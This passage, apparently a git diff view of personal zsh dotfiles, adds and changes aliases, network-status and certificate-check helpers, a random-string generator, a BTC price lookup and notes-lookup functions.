wget --spider -S "http://link.g6.network/" 2>&1 | grep "HTTP/"
echo "HTTP responses Gen6 LinkFree"
timeout 2 websocat -1 wss://gen6.app/node -v 2>&1 | timeout 2 grep "Connected"
}
# Show certificate of website
function chkcrt {
# check ssl certificate of a server
openssl s_client -showcerts -connect $1:$2
}
# Quickly get random characters
function rnd {
# get some random characters
cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-8};echo;
cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-16};echo;
cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-32};echo;
cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-64};echo;
}

16
zsh_files/general.zsh
View File

@ -1,24 +1,19 @@
#Aliases #Aliases
alias py='python3' alias py='python3'
alias python='python3' alias bcp='python3 ~/.cryptozsh_tools/bcp.py'
alias ratesx='curl rate.sx'
alias hash-identifier='python3 ~/.cryptozsh_tools/hash-identifier.py' alias hash-identifier='python3 ~/.cryptozsh_tools/hash-identifier.py'
# Add yours :) # Add yours :)
# Menuselect and requirements for v3das (changing this might break v3das) # Menuselect and requirements for v3das (changing this might break v3das)
autoload -U compinit autoload -U compinit
compinit compinit
zstyle ':completion:*' menu select=2 zstyle ':completion:*' menu select=2
# Make ctrl+backwards work
bindkey "^[[1;5C" emacs-forward-word
bindkey "^[[1;5D" emacs-backward-word
# History # History
HISTFILE=~/.zsh_history # Off
HISTSIZE=69
SAVEHIST=50
setopt appendhistory
# Opts # Opts
setopt AUTO_CD setopt AUTO_CD
@ -72,9 +67,10 @@ function git_prompt_info {
PROMPT='%{$fg[yellow]%}$(whoami)%{$reset_color%} %~%<< $(git_prompt_info) ${PR_BOLD_WHITE}>%{${reset_color}%} ' PROMPT='%{$fg[yellow]%}$(whoami)%{$reset_color%} %~%<< $(git_prompt_info) ${PR_BOLD_WHITE}>%{${reset_color}%} '
# btc price check on coindesk # btc price check on coindesk
function btcp { function btcp {
#. torsocks on # Turn on for extra security . torsocks on # Turn on for extra security
echo "BTC price on CoinDesk " echo "BTC price on CoinDesk "
curl -s https://api.coindesk.com/v1/bpi/currentprice.json | cut -d '"' -f 38 curl -s https://api.coindesk.com/v1/bpi/currentprice.json | cut -d '"' -f 38
} }

1
zsh_files/hacking.zsh 100755
View File

@ -0,0 +1 @@
#TBA

25
zsh_files/vedas.zsh 100755
View File

@ -0,0 +1,25 @@
fpath=(~/.cryptozsh_tools/v3das $fpath)
# Requirements
#autoload -U compinit
#compinit
#zstyle ':completion:*' menu select=2
function nls {
echo "\nYou can get help from the following topics:\n"
for f in ~/.cryptozsh_tools/v3das/* ; do
echo $f | rev | cut -d'/' -f1 | rev | cut -d'.' -f1 | egrep -v "^_n"
done
echo ""
}
function n {
# query knowledgebase, use tab after n
if [ -d "~/.cryptozsh_tools/v3das" ]
then
echo "knowledge base / notes are missing"
else
cat ~/.cryptozsh_tools/v3das/$1
fi
}

3
zsh_files/zshrc
View File

@ -1,3 +0,0 @@
source ~/.gen6zsh/general.zsh
source ~/.gen6zsh/crypto.zsh
source ~/.gen6zsh/gen6.zsh